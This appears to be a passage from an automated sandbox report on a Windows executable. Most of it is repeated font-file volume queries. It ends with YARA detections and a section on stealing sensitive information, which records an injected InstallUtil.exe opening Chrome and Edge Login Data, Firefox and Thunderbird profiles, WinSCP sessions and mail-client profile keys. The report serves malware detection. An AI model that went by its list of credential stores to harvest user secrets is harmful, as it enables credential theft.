                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.n1KVzXM8Wk.exe.119a408fd68.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2959651140.000000000333E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2959651140.0000000003369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: n1KVzXM8Wk.exe PID: 6812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 20140, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
